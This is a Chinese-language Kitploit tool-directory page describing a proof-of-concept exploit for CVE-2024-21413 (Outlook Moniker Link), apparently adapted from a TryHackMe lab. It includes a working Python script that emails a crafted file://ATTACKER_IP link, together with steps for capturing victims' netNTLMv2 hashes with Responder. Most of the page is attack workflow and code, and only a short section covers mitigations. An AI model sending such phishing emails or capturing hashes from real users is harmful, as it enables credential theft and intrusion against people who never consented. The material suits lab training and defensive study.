Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
Email-exploit-Moniker-Link-CVE-2024-21413- — CVE-2024-21413的概念验证漏洞利用,通过HTML电子邮件中的Moniker Link触发SMB连接,并借助Responder捕获netNTLMv2哈希。展示了渗透测试、Python脚本编写和网络协议分析技能。 | Kitploit
工具/GitHubGitHub/yass2400012/email-exploit-moniker-link-cve-2024-21413-
密码破解漏洞利用钓鱼攻击网络安全渗透测试学习与教育红队电子邮件安全实验室与实践

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
GitHub
yass2400012/email-exploit-moniker-link-cve-2024-21413-

Email-exploit-Moniker-Link-CVE-2024-21413-

CVE-2024-21413的概念验证漏洞利用,通过HTML电子邮件中的Moniker Link触发SMB连接,并借助Responder捕获netNTLMv2哈希。展示了渗透测试、Python脚本编写和网络协议分析技能。

查看仓库
511个月前尚未审核

电子邮件漏洞利用 Moniker Link-CVE-2024-21413-Module — 文档

概述: 一个实用的 PoC,演示如何在 HTML 邮件中使用 Moniker Link 触发 Outlook 发起 SMB 连接,从而通过 Responder 捕获受害者的 netNTLMv2 哈希。这展示了在渗透测试、脚本编写和网络协议分析方面的实践技能。


展示的关键技能

  • 使用 Python 脚本自动发送电子邮件
  • 理解 SMB、NTLMv2、LLMNR、NBT-NS 和 MDNS 协议
  • 配置 Responder 并监控以捕获哈希
  • 排查 Linux 网络/DNS 配置问题
  • 在实验室环境中构建受控的进攻性安全场景

PoC 工作流程

  1. 设置 SMB 监听器: 在攻击机上启动 Responder,以监控 SMB 认证尝试。
  2. 发送精心构造的邮件: 使用 Python 脚本发送一封包含 Moniker Link(file://)的 HTML 邮件,该链接指向攻击者的 SMB 共享。
  3. 捕获哈希: 当受害者点击链接时,Outlook 会尝试通过 SMB 获取文件,Responder 将捕获 netNTLMv2 哈希。

最小化漏洞利用脚本

root@kitploit:~
# exploit.py (trimmed)
import smtplib
from email.mime.text import MIMEText
from email.mime.multipart import MIMEMultipart
from email.utils import formataddr

sender = '[email protected]'
receiver = '[email protected]'
mailserver = '10.201.52.124'  # THM SMTP server
password = input('Enter attacker email password: ')

html = '<p><a href="file://ATTACKER_IP/test!exploit">Click me</a></p>'

msg = MIMEMultipart()
msg['Subject'] = 'CVE-2024-21413'
msg['From'] = formataddr(('CMNatic', sender))
msg['To'] = receiver
msg.attach(MIMEText(html, 'html'))

with smtplib.SMTP(mailserver, 25) as s:
    s.ehlo()
    s.login(sender, password)
    s.sendmail(sender, [receiver], msg.as_string())
    print('Email delivered')

提示: 在运行前替换 ATTACKER_IP 和 mailserver。在 TryHackMe 实验室中,密码是 attacker。


运行 Responder

root@kitploit:~
responder -I ens5

将 ens5 替换为你的网络接口名称。


排查 /etc/resolv.conf 问题

有时 Responder 会因 /etc/resolv.conf 中的符号链接损坏而失败。可通过以下命令修复:

root@kitploit:~
rm -f /etc/resolv.conf
printf "nameserver 8.8.8.8
nameserver 1.1.1.1
" > /etc/resolv.conf
chmod 644 /etc/resolv.conf
cat /etc/resolv.conf

重点技能: Linux 故障排查、DNS 配置,以及将工具适应到云/虚拟机环境。


进度截图

  1. 错误 / resolv.conf 问题:` 错误 resolv.conf

  2. DNS 修复已应用: DNS 修复设置

  3. Python 邮件脚本: Python 邮件脚本

  4. 漏洞利用投递: 漏洞利用投递

  5. 受害者收件箱: 受害者邮件

  6. 捕获的受害者哈希: 捕获的受害者哈希


使用的工具与命令

  • Responder:SMB/LLMNR/NBT-NS/MDNS 监听器
  • Python3:执行 PoC 邮件脚本
  • smtplib / email.mime:用于构造和发送邮件的 Python 库
  • 用于 DNS 故障排查的 Linux shell 命令

学到的技能 / 作品集亮点

  • 网络攻击模拟与漏洞利用工作流程
  • 自动化社会工程学攻击向量(Moniker Link 邮件)
  • 捕获和分析 netNTLMv2 哈希
  • 跨学科故障排查:Python、网络、Windows 与 Linux 交互
  • 面向技术评审人员的文档和工作流展示

缓解与防御说明

  • 在 Outlook 中禁用自动加载外部内容
  • 阻止到不受信任网络的外发 SMB
  • 在 Windows 客户端上强制实施 SMB 签名和现代认证策略

致谢

改编自 TryHackMe MonikerLink 实验室及 CMNatic 的原始 PoC(GitHub)

下载工具